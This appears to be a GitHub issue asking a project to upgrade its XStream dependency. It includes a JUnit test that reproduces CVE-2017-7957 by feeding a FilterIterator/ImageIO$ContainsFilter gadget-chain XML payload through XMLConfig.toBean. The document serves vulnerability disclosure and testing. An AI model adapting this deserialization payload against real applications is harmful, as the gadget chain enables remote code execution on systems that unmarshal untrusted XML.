
更新 xstream dependency version  #44

@NEUZhangy

Description

@NEUZhangy

T obj = (T) xstream.fromXML(xml);
is affected by the old xstream version and may cause remote code execution; see the test below:

package plm.common.utils;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.core.JVM;
import org.junit.Before;
import org.junit.Test;

import java.util.Iterator;

import static org.junit.Assert.assertEquals;

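/**
 * Reproduction for the XStream deserialization issue behind this report
 * (CVE-2017-7957): {@code XMLConfig#toBean} hands caller-supplied XML to
 * {@code XStream#fromXML}, so a crafted document can make XStream instantiate
 * JDK classes and invoke a method on them when the result is used.
 *
 * <p>The payload and assertions are adapted from XStream's own
 * {@code SecurityVulnerabilityTest}. Note the inverted meaning of a green run:
 * the assertions pass only when the gadget chain actually executes, i.e. a
 * passing test confirms the vulnerability. After upgrading the XStream
 * dependency and restricting the types {@code XMLConfig}'s XStream instance may
 * unmarshal (e.g. via {@code allowTypes}), the call is expected to be rejected
 * instead and this test would then fail.
 */
public class XMLConfigTest {

    // Expected to be appended to by the Exec helper named in the payload
    // (com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec). Nothing in
    // this class writes to it, so that helper must be on the test classpath for
    // the final assertion to be meaningful — TODO confirm it is provided.
    private static final StringBuilder BUFFER = new StringBuilder();

    private XMLConfig xmlConfig;

    @Before
    public void setUp() {
        xmlConfig = new XMLConfig();
    }

    /**
     * Feeds the CVE-2017-7957 payload through {@link XMLConfig#toBean} and
     * checks whether the gadget chain runs when the returned iterator is
     * advanced.
     *
     * <p>Guarded by {@code JVM.isVersion(7)}: when that check is false the body
     * is skipped and the test passes vacuously rather than being reported as
     * skipped.
     */
    @Test
    public void testToBeanVulnerableToCVE_2017_7957() {
        if (!JVM.isVersion(7)) {
            return;
        }
        final String xml = ""
            + "<string class='javax.imageio.spi.FilterIterator'>\n"
            + " <iter class='java.util.ArrayList$Itr'>\n"
            + "   <cursor>0</cursor>\n"
            + "   <lastRet>1</lastRet>\n"
            + "   <expectedModCount>1</expectedModCount>\n"
            + "   <outer-class>\n"
            + "     <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n"
            + "   </outer-class>\n"
            + " </iter>\n"
            + " <filter class='javax.imageio.ImageIO$ContainsFilter'>\n"
            + "   <method>\n"
            + "     <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n"
            + "     <name>exec</name>\n"
            + "     <parameter-types/>\n"
            + "   </method>\n"
            + "   <name>exec</name>\n"
            + " </filter>\n"
            + " <next/>\n"
            + "</string>";

        // Unmarshalling happens inside XMLConfig, which owns its own XStream
        // instance; a whitelist configured on a locally created XStream would
        // have no effect on this call, so none is created here.
        final Iterator<?> iterator = (Iterator<?>) xmlConfig.toBean(xml, Iterator.class);
        assertEquals(0, BUFFER.length());
        // Advancing the iterator is what triggers the filter's method invocation.
        iterator.next();
        assertEquals("Executed!", BUFFER.toString());
    }
}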
